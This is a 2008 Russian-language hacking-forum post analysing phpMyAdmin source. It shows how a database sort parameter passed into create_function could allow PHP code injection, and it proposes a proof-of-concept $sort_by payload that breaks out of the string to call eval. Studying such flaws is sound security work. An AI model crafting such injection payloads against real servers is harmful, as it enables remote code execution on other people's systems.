28.09.2008, 16:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
2 1ten0.0net1:
Посмотрев на исходник - вижу структуру:
PHP код:
$apply_limit_and_order_manual = true;
if (PMA_MYSQL_INT_VERSION >= 50002) {
...
if ($GLOBALS['cfg']['NaturalOrder']) {
...
} else {
...
$apply_limit_and_order_manual = false;
}
}else{
...
}
if ($apply_limit_and_order_manual) {
if ($GLOBALS['cfg']['NaturalOrder']) {
$sorter = 'strnatcasecmp';
} else {
$sorter = 'strcasecmp';
}
// produces f.e.:
// return -1 * strnatcasecmp($a["SCHEMA_TABLES"], $b["SCHEMA_TABLES"])
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
usort($databases, create_function('$a, $b', $sort_function));
}
Если реально есть php-инжект, то MySQL<5 или $GLOBALS['cfg']['NaturalOrder'].
Тогда надо извращаться с
PHP код:
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
Не имея всего скрипта, проверять не могу - но предполагаю, что надо что-то типа
PHP код:
$sort_by = SCHEMA_TABLES"], $b)*(eval("print 'xek';")==1?1:0);//
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|